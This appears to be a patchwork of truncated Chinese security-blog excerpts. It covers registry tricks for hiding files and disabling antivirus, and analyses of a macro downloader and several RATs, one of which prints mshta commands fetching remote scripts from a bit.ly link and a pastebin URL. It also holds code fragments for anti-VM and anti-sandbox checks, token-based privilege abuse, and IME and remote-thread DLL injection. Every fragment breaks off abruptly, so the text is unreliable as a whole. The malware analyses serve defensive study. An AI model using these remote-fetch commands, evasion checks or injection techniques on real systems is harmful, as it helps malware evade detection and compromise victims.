注册表文件隐藏[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]CheckedValue = 0 //此时无法通过文件夹选项设置成功CheckedValue = 1 //Windows默认值把CheckedValue修改成Windows默认值1后，系统恢复正常。 [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden]这个对隐藏文件有用 关闭杀软[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Feature] 网络相关[SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] safe

基本信息 FileName FileType MD5 Size 58e4d0.xls Downloader 3effeba64d9a1a4dd1bddaeb1858e4d0 346112 bytes 简介带有恶意宏的office文件，加载dll，下载程序执行 流程图 详细分析有宏，会在你允许宏运行的时候执行起来首先会切换目录到TMPT下 然后会调用窗体UserFrom1的Show方法,也就值展示提示窗体在展示的时候会执行UserFrom_Activate()函数，也就会调用CreatGifFile这个方法这个方法在模块 modle1中定义拼接在TEMP下的路径，根据系统位数走不同分支，我这里是win7 32位下面会拷贝本身到上面拼接好的路径 TempName中，然后复制到ZipName中会把ZipName文件按压缩包打开，取出xl\embeddings\oleObject1.bin保存到Tmp\oleObject.bin中最后会调用ReadAndWriteExtractedBinFile函数，这个函数是在oleObject.bin中找到MZ开头的字符区，然后读取指定字节

基本信息 FileName FileType MD5 Size Order____679873892.xls rat 7641FEF8ABC7CB24B66655D11EF3DAF2 41472 bytes 简介该样本语言类型为 VBS和JS编写，中间过程完全使用无文件格式，内容也都能随时在线更改，在一定程序上能躲避安全软件的查杀，通过不同混淆更容易达到免杀的效果。 流程图 详细分析文件有宏，且宏有密码，可以使用offkey直接更改宏密码进入宏代码后在shell(fun)处下断，可以拿到shell 的连接地址 mshta http://bit.ly/8hsshjahassahsh 打开这个页面看似是一个正常页面，但仔细查找是能在源码中找到恶意js代码的拿出来使用console打印出来处理后执行了WScript.Shell.Run mshta http://www.pastebin.com/raw/nv5d9pYu,vbHide看看究竟是什么东西木马作者选择了一个匿名代码存放地址网站，来逃避追踪。但是目前这个RWA地址页面已经被删除了这个样本在any.run上有人运行过，有

FindAntiVM 来自github 如果找到，以红色标注 from idautils import * from idc import * heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA())) #Calls to autorun/autorunsc -- these hide signed MS entries!! pill_check = ['sidt', 'sgdt', 'sldt', 'smsw', 'str', 'in'] malicious_check = ['cmd','cpuid','autorun', 'autorunsc'] vmware_check = ['Vmtoolsd', 'Vmwaretrat', 'Vmwareuser', 'Vmacthlp'] vbox_check =

因为沙箱的仿真度不全问题，可能造成仿真系统上的音频设备功能与真机的差异，通过这来实现检测是否在沙箱中运行。 但经测试 any.run 和微步 都未被识别为沙箱 这里只是介绍下可以使用COM对系统基础设备的操作，来检测虚拟沙箱。 #include "stdafx.h" #include <conio.h> #include <windows.h> #include <dshow.h> #include <objbase.h> #pragma comment(lib, "Strmiids.lib") void useCom() { /* 这些只是一些随机检查，以确保恶意软件在真实系统上执行。 只有安装了音频设备，此处的沙箱才会被视为真实系统。 大多数仿真器都会失败，因为几乎不可能为现代操作系统中的每个COM接口实现适当的支持。 */ CoInitialize(0); wchar_t * filerName = L"random_nam

基本信息 FileName FileType MD5 Size 4gdrwceq60b7dbl.sct rat 69B7D326575C5616D82645960B3D081A 403845 bytes 简介该样本语言类型为 VBS和JS编写，在一定程序上能躲避安全软件的查杀，通过不同混淆更容易达到免杀的效果。 流程图 详细分析这个样本母体总共会释放3个脚本 脚本1首先我们看看4gdrwceq60b7dbl.sct，这个样本的母体，是一个sct格式的文件这是Visual FoxPro的表单配置文件我们用Sublimi Text来打开它，记事本也是可以的。 利用组数来存关键字符串，通过字符串的拼接来合成完整路径会尝试删除%APPDATA%\\taskmgr.js 这个文件文件中有很长一段密文，这里我改名为了EncodeList，通过System.IO.MemoryStream.WriteByte()方法把数据读入数据流中。最重要的是使用ADODB.Stream类方法把这个数据流保存到了被上面删除掉的%APPDATA%\\taskmgr.js文件中最后使用WScript.S

什么是特权 注意，这里说的提权不是从Administrator提升到 System,只是开启一些Administrator组的特殊权限 查看用户组信息使用命令 whoami /all Administrator组管理员组一般权限比较多，但是很多都禁用了,我们这里需要的是SeDebugPrivilege，要是进程拥有了这个权限，就能对任意进程进行操作（包括system） 当用户试图执行一个特权操作，系统检查用户的访问令牌以确定使用是否具有必要的特权。调用GetTokenInformation函数可以检查特权。 我要做的就是找到找到一个系统中有SeDebugPrivilege权限的令牌，然后复制下来，把自己的令牌改为他这个，然乎自己就拥有了SeDebugPrivilege权限了。这也就是提升权限的核心。 下图是我使用 OpenProcess对SID为4的系统进程进行操作，且操作权限是PROCESS_ALL_ACCESS 下面看看具体实现 void CgPivilige() { BOOL retn; HANDLE hToken; retn = OpenPro

@[toc] 基本信息 FileName FileType MD5 Size sample.exe rat 4D049BC19B03572EF8A00980050BAFFF 28160 bytes 简介此木马拥有横向传播能力扫描局域网主机，利用弱口令尝试登陆，上传运行自身，这样来传播。该木马会获取并上传被害者系统配置，方便进一步攻击，木马中有接收命令，执行命令的模块，也是这个木马的核心，达到执行作者发过来的命令该木马主要使用壳伪装自己，让安全软件不能找到敏感关键字符串，从而躲避安全软件的查杀。 流程图 详细分析程序加了两个壳，一个压缩壳UPX，一个Armadillo 都能用PEID插件脱掉 点击脱壳之后修复下导入表就好了，修复之后查壳效果 静态分析导入函数还有很多字符串就不列了，格式都是这种。从字符串中能看出，该样本有命令执行，联网，创建服务，处理资源数据，操作注册表的功能基本也就能猜测是释放资源段文件到新文件，然后加入服务启动，来达到启动的目的，下面看啊可能具体操作。 动态加IDA该样本定义大量局部变量，使用硬编码方式存储数据移动到ascii上，右键char就可以看到字

特性因为输入法的本身特性，能注入任何一个程序，还可以开机启动，很是友好 网上大都是一个版本方法，我记录下我自己过程 思路1.编写一个正常的输入法2.将它安装到电脑上，并设置为默认输入法，这样就可以在程序打开的时候就调用它的处理函数 因为输入是一个特殊的dll，本质就是一个dll，只是后最不同而已。 一个最简ime文件都必须两个函数 一个dllmain() 还有一个ImeInquire()这两个是必须的 编写输入法主要文件创建一个dll项目,解释都在注释中（注意项目为多字节字符集）dllmain.cpp #include "stdafx.h" #include "windows.h" #include "imm.h" #include "immdev.h" #pragma comment(lib,"imm32.lib") LPCSTR injectDllPaht = "C://expDll.dll"; //我们最终利用的Dll，写入自己的功能 void injectD

什么是远线程注入在一个进程中，调用CreateThread或CreateRemoteThreadEx函数，在另一个进程内创建一个线程（因为不在同一个进程中，所以叫做远程线程）。创建的线程一般为Windows API函数LoadLibrary，来加载一个动态链接库(DLL)，从而达到在另一个进程中运行自己所希望运行的代码的目的。 代码下面例子是根据查询一打开窗口中的计算器进程，然后注释都很详细 #include "windows.h" #include "Tlhelp32.h" int InjectDll(DWORD dwProcessId, PTCHAR szDllName); int EnablePrivilege(bool isStart); DWORD GetProcessId(PTCHAR pszProcessName); void main() { DWORD ProcessId = GetProcessId("calc.exe");\\目标程序 InjectDll(ProcessId ,&quo